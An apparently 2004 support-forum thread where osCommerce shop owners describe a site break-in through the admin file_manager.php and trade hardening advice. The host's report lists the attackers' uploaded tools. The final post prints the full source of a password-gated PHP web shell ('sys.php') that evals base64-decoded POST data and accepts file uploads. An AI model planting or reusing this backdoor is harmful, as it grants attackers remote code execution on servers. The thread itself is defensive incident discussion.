17 replies to this topic

[TBK3]

I started receiving e-mails from customers lastnight. At first it appeared to be a non issue, this morning I received the following from my host:

I'm still investigating the matter, however I can say that your site was indeed compromised via osCommerce on 8/5/2004... Even though you are running the osCommerce 2.2 version (latest available for download), it would seem that this cracking crew is using a fairly recent exploit... You can view the vulnerability list for this script here: http://www.osvdb.org/searchdb.php?vuln_tit...d&search=search

The crackers appear to hang out in an IRC channel named #hack.ru, and this coincides with some of the (cracker tools) configuration files being in russian...

They had full access to your site, and at this point none of your content can be trusted...

What I will do is tarball your entire site so that you can download it... Since they had full access, you will need to completely audit each and every file to ensure there were no further defacement and/or backdoors/trojans installed into your account...

IS THERE A SECURITY PATCH FOR THIS????

[drakonan]

Which of the vulnerabilities that your link provides was used and what evidence do you have of this?

[Mibble]

if you read what it states, in order for anyone to access that alledged security breach, they would need (if your site is password protected in the admin) to know a username and password to get into the admin area to execute the problem.
one thing i know, most people use very simple passwords and names for their admin or do not even have themselves protected.
was your site protected in the admin area?

[drakonan]

You simply needed to have the newest release of osCommerce and a password protected admin to be protected from all these problems.

[TBK3]

Thanks for the feedback.

The secure admin contributions that I have tried to apply do not seem to work with my configuration; the secured area operates on an entirely different server.

I had written the host to secure the admin directory and that was upposed to have happened ....

The good news is that I may have a copy from before the breech (8/5/2004).

As to evidence, I am simply relying on the tracking through the internal logs by my host.

I am running the most current version of osCommerce.

[drakonan]

Before you went live you should have had that protected. In my opinion, you weren't hacked if they simply were able to go to your admin folder.

I didn't install any kind of contrib for that, folder password protecting can be done through most cpanels, and if not there, manually with a .htaccess file.

It's pretty much a given that an osc install will have a /admin folder either under the /catalog dir or "beside" it.

[TBK3]

I guess hacked is in the rear of the receiver. The code on my website has been described as "riddled."

If someone would describe your security suggestions a bit simpler, I would appreciate it. I had already requested that the htaccess be set for my admin directory.

I have repeatedly tried to get advice on admin security, but the general attitude has been, "that's already been answered," but the answers make little sense.

While I may not be as gifted as some, neither am I a complete idiot. A solid, basic explanation in English is what's needed, please.

Additionally, from my reading from the weblink in my initial posting, there is a file management program based on osCommerce which appears to circumvent security.

[AlanR]

I think one reason people hesitate to give specific instructions regarding .htaccess is that some newbies have gotten completely tangled up with it. It then spawns a whole series of problems. The best thing is to use the facilities provided by your host and if your host does not offer tools for protecting folders then switch hosts, it's basic functionality that any good host should offer.

There's also some basic security that is wise in addition to .htaccess

Rename the admin folder and put it outside of catalog. It can be anywhere, any layer deep. Most people seeking to exploit osC will look for an admin folder and most will find it because hardly anyone moves or renames it.

I think file_manager.php can be removed with hardly any loss since its editing features cause so many problems anyway.

There's some other security tricks but I'm not going to post them in public.

[TBK3]

I thought I would share with you how I lost my site. This is correspondence with my site hosts:

####
How can you tell that 8/5 was the date of the hack?
####

Because that is when there is a concentrated effort to crack: /catalog/admin/file_manager.php

from the IP: 57.72.131.73

They used the exploit to upload some 'cracker helper' scripts, one of them being: /catalog/nfm.php (their file manager)

The first access to this was: 8/5/2004 10:52:39

The way the exploitation efforts transpired, it follows a logical procession from cracking your script to uploading then using cracker friendly utilities (such as nfm.php)...

I have found the following classes of cracker utils:
1) nfm.php == remote file manager
2) rvtr.php == remote file viewer
3) bindit == remote command line shell binder
4) overkill == program to try and gain root privileges from the 'overkill' binary (we are unaffected by this)
5) psybnc == anonymous IRC proxy daemon

[jenming]

for a decent description on how to use an .htaccess file to secure a directory, check out:

http://httpd.apache.org/docs/howto/auth.html

[Mark Evans]

If you dont protect your admin there isnt much we can do.

The filemanager in CVS has been updated to prevent this from being possible in newer version of osCommerce.

[april_floyd]

I have been reading this topic to ascertain the best method to secure my site (not yet open to public) If I rename the Admin Directory will that stop anything working. Is it simply a matter of changing the name or is their something else to do.

[ozcsys]

april_floyd, on Aug 31 2004, 03:39 AM, said:

I have been reading this topic to ascertain the best method to secure my site (not yet open to public) If I rename the Admin Directory will that stop anything working. Is it simply a matter of changing the name or is their something else to do.

You can rename it and move it but you will need to make sure that you change the path info in your admin/includes/configure.php file to match its new name and location.

[TBK3]

To avoid a further break in do I only need to protect the Admin directory or where does the moat need to be dug to protect the gate?

[Mibble]

only the admin, if you protect the others then the customer can not purchase . ..

[TBK3]

Interesting, whenever I tried one of the protection contributions they DID prevent anyone from ordering anything.

As soon as I can get my courage up, I'll give it a try.

[Johnson]

TBK3, on Sep 3 2004, 12:36 AM, said:

Interesting, whenever I tried one of the protection contributions they DID prevent anyone from ordering anything.

As soon as I can get my courage up, I'll give it a try.

I do not believe that there are any contributions that will secure your site - you must implement directory permissions throughout your whole site - the admin must be password protected server side - password scripts are easily bypassed.

Matti

[Googlugly]

TBK3, on 30 August 2004, 18:58, said:

I started receiving e-mails from customers lastnight. At first it appeared to be a non issue, this morning I received the following from my host:

I'm still investigating the matter, however I can say that your site was indeed compromised via osCommerce on 8/5/2004... Even though you are running the osCommerce 2.2 version (latest available for download), it would seem that this cracking crew is using a fairly recent exploit... You can view the vulnerability list for this script here: http://www.osvdb.org/searchdb.php?vuln_tit...d&search=search

The crackers appear to hang out in an IRC channel named #hack.ru, and this coincides with some of the (cracker tools) configuration files being in russian...

They had full access to your site, and at this point none of your content can be trusted...

What I will do is tarball your entire site so that you can download it... Since they had full access, you will need to completely audit each and every file to ensure there were no further defacement and/or backdoors/trojans installed into your account...

IS THERE A SECURITY PATCH FOR THIS????

Same stuff happened to me on 3 of my Oscommerce website.

One of the file used by the hacked is "sys.php" and the content is as follows:

<?php
if (sha1(md5(sha1($_POST['key']))) == "697e86fd67cd215cfa03b98a5c3a1d7b34a79534")
if(isset($_POST['eval']))
eval (base64_decode($_POST['eval']));
else
move_uploaded_file($_FILES['uploaded']['tmp_name'], basename($_FILES['uploaded']['name']));
else
header("Location: /");
?>